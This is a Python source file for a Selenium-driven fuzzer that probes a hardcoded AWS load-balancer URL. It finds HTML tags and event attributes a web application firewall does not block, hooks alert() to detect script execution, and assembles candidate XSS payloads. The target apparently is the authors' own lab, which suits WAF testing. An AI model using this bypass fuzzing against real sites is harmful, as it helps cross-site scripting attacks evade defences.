182 lines
6.1 KiB
Python
182 lines
6.1 KiB
Python
from urllib.parse import unquote
|
|
import selenium
|
|
import time
|
|
from selenium import webdriver
|
|
from selenium.webdriver.support.ui import WebDriverWait
|
|
from urllib.parse import urlparse
|
|
from urllib.parse import urlencode
|
|
from language import HTMLTag, HTMLAttribute, HTMLTagAttributeType
|
|
from tags import GlobalAttributes, EventsAttributes, TagSpecificAttributes, Tags
|
|
from mutations import Mutations
|
|
from utils import choice
|
|
|
|
# WAFBypass class
|
|
|
|
|
|
class WAFBypass():
|
|
code = "window.alert_trigger = false;window.alert = function() {window.alert_trigger = true;}"
|
|
|
|
def __init__(self, url) -> None:
|
|
self.options = webdriver.ChromeOptions()
|
|
self.options.add_argument('--no-sandbox')
|
|
self.options.add_argument('--headless')
|
|
self.unfiltered_attributes = {}
|
|
self.unfiltered_tags = []
|
|
self.driver = webdriver.Chrome(options=self.options)
|
|
self.url = urlparse(url)
|
|
self.mutator = Mutations()
|
|
|
|
if not self.check_connection():
|
|
raise Exception("Connection Error")
|
|
|
|
self.driver.execute_cdp_cmd(
|
|
"Page.addScriptToEvaluateOnNewDocument", {"source": self.code})
|
|
|
|
def check_connection(self):
|
|
try:
|
|
self.driver.get(self.url.geturl())
|
|
return True
|
|
except:
|
|
return False
|
|
|
|
def wait_for_pageload(self):
|
|
try:
|
|
WebDriverWait(self.driver, 4).until(
|
|
lambda driver: driver.execute_script("return document.readyState") == "complete")
|
|
except TimeoutError:
|
|
raise Exception("Page Load Error")
|
|
|
|
def get_page_title(self):
|
|
return self.driver.title
|
|
|
|
@property
|
|
def is_403(self):
|
|
return self.driver.title == "403 Forbidden"
|
|
|
|
@property
|
|
def triggered_xss(self):
|
|
return self.driver.execute_script("return window.alert_trigger")
|
|
|
|
def navigate(self, url):
|
|
self.driver.get(url)
|
|
self.wait_for_pageload()
|
|
|
|
is403 = False
|
|
|
|
if self.is_403:
|
|
is403 = True
|
|
else:
|
|
is403 = False
|
|
|
|
triggerxss = self.triggered_xss
|
|
|
|
return (is403, triggerxss)
|
|
|
|
def identify_unfiltered_attributes(self):
|
|
try:
|
|
self.unfiltered_attributes["global"] = []
|
|
self.unfiltered_attributes["events"] = []
|
|
self.unfiltered_attributes["tag_specific"] = {}
|
|
|
|
for attr in GlobalAttributes:
|
|
encoded = urlencode({"param2": f"{attr}"})
|
|
url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}"
|
|
is403, _ = self.navigate(url)
|
|
if not is403:
|
|
self.unfiltered_attributes["global"].append(attr)
|
|
|
|
for attr in EventsAttributes:
|
|
encoded = urlencode({"param2": f"{attr}"})
|
|
url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}"
|
|
is403, _ = self.navigate(url)
|
|
if not is403:
|
|
self.unfiltered_attributes["events"].append(attr)
|
|
|
|
for tag in self.unfiltered_tags:
|
|
try:
|
|
for attr in TagSpecificAttributes[tag.name]:
|
|
if tag not in self.unfiltered_attributes["tag_specific"]:
|
|
self.unfiltered_attributes["tag_specific"][tag.name] = [
|
|
]
|
|
encoded = urlencode(
|
|
{"param2": f"<{tag.name} {attr}/>"})
|
|
url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}"
|
|
is403, _ = self.navigate(url)
|
|
if not is403:
|
|
self.unfiltered_attributes["tag_specific"][tag.name].append(
|
|
attr)
|
|
except KeyError:
|
|
print(f"Tag {tag.name} not found in TagSpecificAttributes")
|
|
except KeyboardInterrupt:
|
|
self.driver.close()
|
|
exit(0)
|
|
|
|
def identify_unfiltered_tags(self):
|
|
try:
|
|
for tag in Tags:
|
|
encoded = urlencode({"param2": f"{tag}"})
|
|
url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}"
|
|
is403, _ = self.navigate(url)
|
|
if not is403:
|
|
self.unfiltered_tags.append(tag)
|
|
except KeyboardInterrupt:
|
|
self.driver.close()
|
|
exit(0)
|
|
|
|
def dry_run(self):
|
|
try:
|
|
self.identify_unfiltered_tags()
|
|
self.identify_unfiltered_attributes()
|
|
for tag in self.unfiltered_tags:
|
|
tag.set_mutator(self.mutator)
|
|
except Exception as e:
|
|
raise Exception(f"Dry Run Error: {e}")
|
|
|
|
def run_fuzz(self):
|
|
self.dry_run()
|
|
|
|
def test(self):
|
|
try:
|
|
self.dry_run()
|
|
print("Unfiltered Tags:")
|
|
for tag in self.unfiltered_tags:
|
|
print(tag.name)
|
|
for _ in range(0, 10):
|
|
tag = choice(self.unfiltered_tags)
|
|
|
|
tag.attributes = []
|
|
tag.children = []
|
|
|
|
nglobattr = choice(range(1, 3))
|
|
nattr = choice(range(0, 3))
|
|
|
|
globals = self.unfiltered_attributes["global"]
|
|
|
|
for _ in range(0, nglobattr):
|
|
if len(globals) == 0:
|
|
break
|
|
attr = choice(globals)
|
|
globals.remove(attr)
|
|
tag.add_attribute(attr)
|
|
|
|
tag.add_attribute(choice(self.unfiltered_attributes["events"]))
|
|
|
|
tag_specific = self.unfiltered_attributes["tag_specific"][tag.name]
|
|
|
|
for _ in range(0, nattr):
|
|
if len(tag_specific) == 0:
|
|
break
|
|
attr = choice(tag_specific)
|
|
tag_specific.remove(attr)
|
|
tag.add_attribute(attr)
|
|
|
|
print(tag)
|
|
|
|
except KeyboardInterrupt:
|
|
self.driver.close()
|
|
exit(0)
|
|
|
|
|
|
w = WAFBypass("http://aws-wafbypass-lb-311079289.eu-south-1.elb.amazonaws.com")
|
|
w.test()
|